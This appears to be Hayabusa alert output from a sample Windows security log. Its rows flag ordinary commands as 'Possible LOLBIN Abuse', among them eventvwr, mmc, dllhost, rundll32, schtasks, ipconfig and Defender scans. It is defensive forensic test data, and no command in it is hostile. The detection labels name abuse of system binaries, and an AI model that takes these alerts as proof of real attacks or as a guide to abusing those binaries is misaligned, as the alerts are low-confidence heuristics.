2016-08-31 03:53:34.038 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x11d4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:53:34.114 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1284 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:54:17.892 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xe18 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:54:17.934 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x880 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:55:17.369 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1670 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:55:17.405 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xd58 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:55:29.358 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-system.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x8dc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:55:29.420 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-system.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x748 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:56:17.432 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1788 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:56:17.468 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x8e4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:56:42.015 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xe70 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:56:42.074 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xfd4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:59:41.893 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xfac | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 03:59:41.954 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1798 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 04:00:08.701 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x14ac | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 04:00:08.738 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1708 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 04:00:25.559 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xf80 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 04:00:25.615 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x2a4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 04:00:45.207 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x298 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 04:00:45.252 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xf44 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 04:02:16.930 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x4cc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 04:02:16.995 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1520 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 04:03:18.080 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x11fc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 04:03:18.108 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xaac | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 05:48:41.903 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13b8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 05:49:01.091 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14c8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 05:50:48.340 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 05:51:10.630 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x10f8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 09:09:04.159 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x1064 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 09:09:04.174 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb50 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 09:11:15.295 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x12b4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 09:11:16.100 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x1264 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 09:11:16.210 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1694 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 09:11:29.568 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x12c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 09:11:35.821 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1300 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 09:12:06.943 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x738 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-31 09:12:06.951 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1128 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-02 00:54:06.516 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | 
PID: 0x1100 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 00:54:07.012 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13f8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 00:54:07.725 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x888 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 00:54:07.802 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1744 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 00:54:09.426 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x1464 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 00:54:28.302 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17bc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 01:12:27.928 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1274 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 01:12:27.973 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x8d0 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 01:18:44.431 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1044 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 01:18:44.458 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x16d4 | User: IEUser | LID: 
0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 02:01:48.411 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xac0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 02:01:48.594 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x1728 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 02:01:48.666 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xc08 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 02:03:48.398 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x14b8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 02:09:30.260 
+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdb4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 02:09:39.134 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8e4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 02:10:01.474 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1720 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 02:26:02.115 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xb0c | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:00:10.327 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x7f4 | User: IE10WIN7$ | LID: 
